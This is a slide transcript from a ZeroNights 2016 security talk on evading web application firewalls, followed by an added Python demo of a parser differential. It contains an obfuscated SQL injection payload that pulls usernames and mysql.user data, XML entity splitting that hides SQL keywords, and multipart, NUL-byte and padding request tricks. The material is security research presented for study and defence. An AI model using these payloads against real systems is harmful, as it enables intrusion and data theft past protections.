
ZeroNights 2016 | A blow below the belt: how to bypass modern WAF/IPS/DLP


There are firewalls built on regular expressions, and there are smart ones. The former are well understood; there was an excellent talk on them at the last Black Hat. Bypassing modern protection, however, calls for a completely different approach.



  1. ZeroNights 2016
  2. Whoami
     Anton "Bo0oM" Lopanitsyn
     ● security researcher
     ● whitehat
     ● bug bounty practitioner
     ● JBFC member
  3. Types of bypasses
     ● Protocol parsing (HTTP, WS, ...)
     ● Data parsers (Base64, XML, JSON, ...)
     ● Detection logic
  4. Detection logic, bla-bla-bla
     1 UNION select@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO $ fRom(SeLEct@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO frOM`information_schema`.`triggers`)0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO WHere !FAlSE||tRue&&FalSe||FalsE&&TrUE like TruE||FalSE union/*!98765select@000OO0O0OooOoO0OOoooOOoOooo0o0o:=grOup_cONcaT(`username`)``from(users)whErE(username)like'admin'limit 1*/select@000OO0O0OooOoO0OOoooO0oOooo0o0o limit 1,0 UnION SeleCt(selEct(sELecT/*!67890sELect@000OO0O0O0oOoO0OOoooOOoOooo0o0o:=group_concat(`table_name`)FrOM information_schema.statistics WhERE TABLe_SCHEmA In(database())*//*!@000OO0O0OooOoO0OOoooO0oOooo0o0o:=gROup_conCat(/*!taBLe_naME)*/fRoM information_schema.partitions where TABLe_SCHEma not in(concat((select insert(insert((select (collation_name)from(information_schema.collations)where(id)=true+true),true,floor(pi()),trim(version()from (@@version))),floor(pi()),ceil(pi()*pi()),space(0))), conv((125364/(true-!true))-42351, ceil(pi()*pi()),floor(pow(pi(),pi()))),mid(aes_decrypt(aes_encrypt(0x6175746F6D6174696F6E,0x4C696768744F53) ,0x4C696768744F53)FROM floor(version()) FOR ceil(version())),rpad(reverse(lpad(collation(user()),ceil(pi())--@@log_bin,0x00)),!!true,0x00),CHAR((ceil(pi())+!false)*ceil((pi()+ceil(pi()))*pi()),(ceil(pi()*pi())*ceil(pi()*pi()))-- cos(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--ceil(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))- cos(pi()),(ceil(pi()*pi())*ceil(pi()*pi()))--floor(pi()*pi()),(ceil(pi()*pi())*ceil(pi()*pi()))- floor(pi()))),0x6d7973716c))from(select-- (select~0x7))0o0oOOO0Oo0OOooOooOoO00Oooo0o0oO)from(select@/*!/*!$*/from(select+3.``)000oOOO0Oo0OOooOooOoO00Oooo0o0oO)0o0oOOO0Oo0OOooOooOoO00Oooo0o0oO/*!76799sElect@000OO0O0OooOoO00Oooo0OoOooo0o0o:=group_concat(`user`)``from`mysql.user`WHeRe(user)=0x726f6f74*/#(SeLECT@ uNioN sElEcT AlL group_concat(cOLumN_nAME,1,1)FroM InFoRMaTioN_ScHemA.COLUMNS where taBle_scHema not in(0x696e666f726d6174696f6e5f736368656d61,0x6d7973716c)UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO UNION SELECT@000OO0O0OooOoO0OOoooO0oOooo0o0oOO UNION SELECT@0o0oOOO0Oo0OOooOooOoO00Oooo0o0oOO)
  5. Data parsers
     <?xml version="1.0" encoding="utf-8"?>
     <bla></bla>
     <data>&lt;?xml version="1.0" encoding="utf-8"&gt;&lt;!ENTITY XXE Attack&gt;&lt;bla&gt;&lt;/bla&gt;</data>
     <bla></bla>
  6. Data parsers
     <?xml version="1.0" encoding="UTF-8"?>
     <!DOCTYPE authorid [
     <!ENTITY a "UNI">
     <!ENTITY b "SELE">
     <!ENTITY c "pass">
     <!ENTITY d "FR">
     <!ENTITY e "admins">
     <!ENTITY f "WHE">
     ]>
     <authorid>-1 OR &a;ON &b;CT &c;wd &d;OM &e; &f;RE id=1</authorid>
  7. HTTP requests & HTTP parsers
  8. Multipart
     Content-Type: multipart/form-data, boundary=AaB03x

     --AaB03x
     Content-Disposition: form-data; name="field1"

     Joe Blow
     --AaB03x
     Content-Disposition: form-data; name="pics"; filename="file1.txt"
     Content-Type: text/plain

     ... contents of file1.txt ...
     --AaB03x--
  9. The same parameter, two encodings
     POST /hello HTTP/1.1
     Content-Type: application/x-www-form-urlencoded

     param=Attack

     POST /hello HTTP/1.1
     Content-Type: multipart/form-data, boundary=AaB03x

     --AaB03x
     Content-Disposition: form-data; name="param"

     Attack
  10. Content-Disposition trick
      Content-Disposition: form-data; name="param"text"text"'test';
      Content-Disposition: form-data; name=”param
      Content-Disposition: form-data; name=param
      Content-Disposition: attachment; name=param
      Content-Disposition: name=param
  11. Content-Disposition tricks
      Content-Disposition: attachment; name = param

      Attack!
  12. Headers tricks
      POST / HTTP/1.1
      Content-Type: multipart/form-data; boundary
      Content-Type: multipart/form-data; boundary=Test
      Content-Type: multipart/form-data; boundary

      --Test
      Content-Disposition: form-data; name=param

      Attack
  13. Headers tricks
      POST / HTTP/1.1
      Content-Type: multipart/form-data; boundary
      Content-Type: multipart/form-data; boundary=
      Content-Type: multipart/form-data; boundary

      --
      Content-Disposition: form-data; name=param

      Attack
  14. Headers tricks. RFC? What is RFC?
      POST / HTTP/1.1
      Content-Type: multipart/form-data; xxxboundaryxxx=Test; boundary=hello;

      --Test
      Content-Disposition: form-data; name=param

      Attack
  15. Boundary prefixes
      Content-Type: multipart/form-data; boundary=gg
      Content-Type: multipart/form-data; boundary=ggg
      Content-Type: multipart/form-data; boundary=gg
      Content-Type: multipart/form-data; boundary=ggg
      Content-Type: multipart/form-data; boundary=ggg
      Content-Type: multipart/form-data; boundary=!ggg
  16. HTTP compression
      Content-Encoding: gzip
      Previous tricks ;)
  17. PHP + %00
  18. PHP <3 (a NUL byte, \x00, inside the boundary parameter)
      POST /phpmustdie.php HTTP/1.1
      Content-Type: multipart/form-data; boundary=Test\x00othertext;

      --Test
      Content-Disposition: form-data; name=param

      Attack
  19. PHP <3 (a NUL byte inside the delimiter line)
      POST /phpmustdie.php HTTP/1.1
      Content-Type: multipart/form-data; boundary=Test;

      --Test\x00othertext
      Content-Disposition: form-data; name=param

      Attack
  20. PHP <3 (a NUL byte inside the value)
      POST /phpmustdie.php HTTP/1.1
      Content-Type: multipart/form-data; boundary=Test;

      --Test
      Content-Disposition: form-data; name=param

      Attack\x00othertext
  21. Header flooding
      POST /hello HTTP/1.1
      Foo: bar
      Foo: bar
      ...
      Foo: bar
      Foo: bar
      Content-Type: application/x-www-form-urlencoded

      param=Attack
  22. Padding past the inspection limit
      POST /hello HTTP/1.1
      Content-Type: application/x-www-form-urlencoded

      param=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA*(8kb)' union select from ...
  23. Anton "Bo0oM" Lopanitsyn
      https://bo0om.ru
      i@bo0om.ru
      @i_bo0om
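The multipart tricks of slides 10 to 20 and the entity splitting of slide 6 all exploit one gap: the WAF parses the request one way and the backend another, so the detection logic never sees the bytes the application executes. The script below is an added example, not code from the talk or from Bo0oM. It pairs a strict, RFC-style multipart/form-data parser standing in for the WAF with a lenient parser modelled on the behaviour the slides attribute to PHP (searching the Content-Type header for the word "boundary", taking what follows the next "=", and treating the header and the field value as NUL-terminated C strings); that PHP model, the toy "union select" signature, and every request in CASES are assumptions constructed for the demo.

```python
"""Parser differential: strict (WAF view) vs lenient, PHP-like (backend view)
multipart/form-data parsing, plus XML entity splitting. All inputs constructed."""
import re
import xml.etree.ElementTree as ET


def strict_boundary(content_type: str) -> str:
    """WAF side: split parameters on ';' and match the parameter *name* exactly."""
    media, *params = [p.strip() for p in content_type.split(";")]
    if media.lower() != "multipart/form-data":
        raise ValueError("not multipart/form-data")
    for p in params:
        key, _, value = p.partition("=")
        if key.strip().lower() == "boundary" and value:
            return value.strip('"')
    raise ValueError("no boundary parameter")


def lenient_boundary(content_type: str) -> str:
    """Backend side (assumed model of the PHP behaviour, not PHP's code): the header
    is a C string ending at the first NUL; find 'boundary' anywhere in it and take
    what follows the next '=' up to ',' or ';'."""
    ct = content_type.split("\x00", 1)[0]
    i = ct.lower().find("boundary")
    if i < 0 or "=" not in ct[i:]:
        raise ValueError("no boundary parameter")
    value = ct[i:].split("=", 1)[1]
    if value.startswith('"'):
        return value[1:].split('"', 1)[0]
    return re.split(r"[,;]", value, maxsplit=1)[0]


def parts(boundary: str, body: bytes):
    """Yield (part_headers, value) for each part opened by '--boundary'. The rest of
    the delimiter line is ignored; a delimiter followed by '--' closes the body."""
    for chunk in body.split(("--" + boundary).encode())[1:]:
        eol = chunk.find(b"\r\n")
        if eol < 0 or chunk[:eol].startswith(b"--"):
            break
        part = chunk[eol + 2:]
        if b"\r\n\r\n" not in part:
            continue
        headers, value = part.split(b"\r\n\r\n", 1)
        yield headers, value[:-2] if value.endswith(b"\r\n") else value


# WAF: disposition must be form-data and the name must be quoted.
STRICT_NAME = re.compile(rb'^Content-Disposition:\s*form-data\s*;.*?\bname="([^"]*)"', re.I | re.M)
# Backend: any disposition, optional quotes, whitespace around '=' tolerated.
LENIENT_NAME = re.compile(rb'name\s*=\s*"?([^";\r\n]*)', re.I)


def strict_multipart(content_type: str, body: bytes) -> dict:
    """WAF view of the fields; values are kept byte-for-byte."""
    fields = {}
    try:
        boundary = strict_boundary(content_type)
    except ValueError:
        return fields
    for headers, value in parts(boundary, body):
        m = STRICT_NAME.search(headers)
        if m:
            fields[m.group(1).decode()] = value
    return fields


def lenient_multipart(content_type: str, body: bytes) -> dict:
    """Backend view; a value is cut at the first NUL like a C string."""
    fields = {}
    try:
        boundary = lenient_boundary(content_type)
    except ValueError:
        return fields
    for headers, value in parts(boundary, body):
        m = LENIENT_NAME.search(headers)
        if m:
            fields[m.group(1).decode()] = value.split(b"\x00", 1)[0]
    return fields


def _req(content_type, *lines):
    return content_type, b"\r\n".join(lines) + b"\r\n"


CASES = {  # constructed requests, one per slide trick
    "slide 11: attachment, unquoted name": _req(
        "multipart/form-data; boundary=Test",
        b"--Test", b"Content-Disposition: attachment; name = param", b"", b"Attack!", b"--Test--"),
    "slide 14: xxxboundaryxxx= before boundary=": _req(
        "multipart/form-data; xxxboundaryxxx=Test; boundary=hello;",
        b"--Test", b'Content-Disposition: form-data; name="param"', b"", b"Attack", b"--Test--"),
    "slide 18: NUL inside the boundary parameter": _req(
        "multipart/form-data; boundary=Test\x00othertext;",
        b"--Test", b'Content-Disposition: form-data; name="param"', b"", b"Attack", b"--Test--"),
    "slide 20: NUL inside the value": _req(
        "multipart/form-data; boundary=Test",
        b"--Test", b'Content-Disposition: form-data; name="param"', b"", b"Attack\x00othertext", b"--Test--"),
}

# Slide 6, with the DOCTYPE the entity declarations need to be well-formed XML.
XML_CASE = (b'<?xml version="1.0" encoding="UTF-8"?>'
            b'<!DOCTYPE authorid [<!ENTITY a "UNI"><!ENTITY b "SELE"><!ENTITY c "pass">'
            b'<!ENTITY d "FR"><!ENTITY e "admins"><!ENTITY f "WHE">]>'
            b'<authorid>-1 OR &a;ON &b;CT &c;wd &d;OM &e; &f;RE id=1</authorid>')
WAF_SIGNATURE = re.compile(rb"union\s+select", re.I)  # toy raw-bytes rule (assumed)


def xml_authorid(raw: bytes) -> str:
    """Backend view: the parser expands internal entities, so the keywords reappear."""
    return ET.fromstring(raw).text


def run_cases() -> dict:
    """{case: (WAF view, backend view)} for every constructed input."""
    out = {label: (strict_multipart(ct, body).get("param"), lenient_multipart(ct, body).get("param"))
           for label, (ct, body) in CASES.items()}
    out["slide 6: XML entity splitting"] = (WAF_SIGNATURE.search(XML_CASE) is not None,
                                            WAF_SIGNATURE.search(xml_authorid(XML_CASE).encode()) is not None)
    return out


if __name__ == "__main__":
    for label, (waf, backend) in run_cases().items():
        print(f"{label:45} WAF: {waf!r:28} backend: {backend!r}")
```

Running it prints, per case, what each side extracts for `param`: for slides 11, 14 and 18 the strict parser finds no field at all while the lenient one returns the payload; for slide 20 both sides see a value, and the difference is the tail after the NUL, which only the backend discards; for slide 6 the raw bytes never contain "UNION SELECT", but the text the XML parser hands to the SQL layer does.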
